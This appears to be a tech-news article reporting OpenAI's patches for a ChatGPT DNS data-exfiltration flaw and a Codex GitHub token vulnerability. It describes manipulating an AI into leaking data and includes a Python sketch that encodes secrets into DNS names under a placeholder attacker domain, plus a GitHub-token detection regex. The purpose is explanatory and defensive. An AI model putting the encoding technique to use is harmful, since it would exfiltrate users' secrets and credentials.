ATLA WIRE

OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability

31.03.2026
ChatGPT and Codex flaws patched in February 2026 could have enabled DNS data exfiltration and GitHub token theft, underscoring enterprise AI security risks.

OpenAI Just Patched Two Nasty AI Security Holes — ChatGPT Could've Leaked Your Data via DNS

OpenAI just dropped patches for two critical vulnerabilities in ChatGPT and Codex that could've let attackers exfiltrate data via DNS queries and steal GitHub tokens. If you're using AI in your enterprise stack, this is your wake-up call.
The ChatGPT flaw, patched in February 2026, was a DNS exfiltration vulnerability. Attackers could have manipulated the AI into sending sensitive data out through DNS queries — using the system's own infrastructure against it. Think of it as a digital Trojan horse hiding in plain sight.
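To see why DNS lookups make such an effective exfiltration channel, here's a generic sketch of the technique — not OpenAI's actual flaw, just the general pattern. Secret data is encoded into DNS-safe hostname labels under a domain the attacker controls (`exfil.example.com` below is a made-up placeholder); when the victim's resolver looks those names up, the attacker's authoritative nameserver receives the data.

```python
import base64

def encode_for_dns(secret: str, attacker_domain: str, label_len: int = 50) -> list[str]:
    """Encode a secret into DNS-safe hostnames (illustration only).

    Base32 output uses only letters and digits, so it survives DNS,
    which is case-insensitive and limits each label to 63 bytes.
    """
    encoded = base64.b32encode(secret.encode()).decode().rstrip("=")
    # Split into label-sized chunks so each fits in one DNS label.
    chunks = [encoded[i:i + label_len] for i in range(0, len(encoded), label_len)]
    # Resolving each hostname delivers its chunk to whoever runs
    # authoritative DNS for attacker_domain.
    return [f"{chunk}.{attacker_domain}" for chunk in chunks]

queries = encode_for_dns("api_key=sk-12345", "exfil.example.com")
```

The defensive takeaway: outbound DNS is almost never blocked, so monitoring for long, high-entropy subdomain labels is one of the few ways to catch this in the act.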
Meanwhile, Codex had a GitHub token vulnerability that could have exposed authentication credentials. This isn't just theoretical — in real enterprise environments, an attacker holding those tokens could have compromised private repositories.
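One practical mitigation while you audit your AI tooling: scan logs, configs, and agent output for leaked GitHub tokens. GitHub's current token formats use recognizable prefixes (`ghp_` for personal access tokens, `ghs_` for server-to-server tokens, `github_pat_` for fine-grained tokens), which makes a simple pattern scan feasible. A minimal sketch:

```python
import re

# GitHub token prefixes: ghp_ (personal), gho_ (OAuth), ghu_/ghs_ (app),
# ghr_ (refresh), github_pat_ (fine-grained PAT).
TOKEN_PATTERN = re.compile(
    r"\b(?:ghp|gho|ghu|ghs|ghr)_[A-Za-z0-9]{36}\b"
    r"|\bgithub_pat_[A-Za-z0-9_]{22,}\b"
)

def find_github_tokens(text: str) -> list[str]:
    """Return candidate GitHub tokens found in the given text."""
    return TOKEN_PATTERN.findall(text)
```

Any hit should be treated as compromised and revoked immediately; secret-scanning tools do essentially this at scale.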
Both vulnerabilities highlight the growing attack surface as AI gets integrated into business workflows. When your AI assistant can potentially leak your data or access your code repositories, that's not just a bug — that's a business risk.
  • ChatGPT DNS exfiltration vulnerability patched February 2026
  • Codex GitHub token vulnerability also patched
  • Both flaws could enable data theft in enterprise environments
  • Highlights growing AI security risks as adoption increases
The timing matters: the patches landed in February 2026, but public disclosure only just happened. If you're running older versions of these AI systems, you may still be vulnerable. Enterprise security teams need to verify that their AI deployments are up to date.
This isn't just about OpenAI — it's about the entire AI security ecosystem. As more companies integrate ChatGPT, Codex, and similar tools into their operations, vulnerabilities like these become pathways for real-world attacks. The line between 'cool AI feature' and 'security risk' just got thinner.
#ChatGPT #OpenAI #AI security #security patches #data leak #AI system vulnerabilities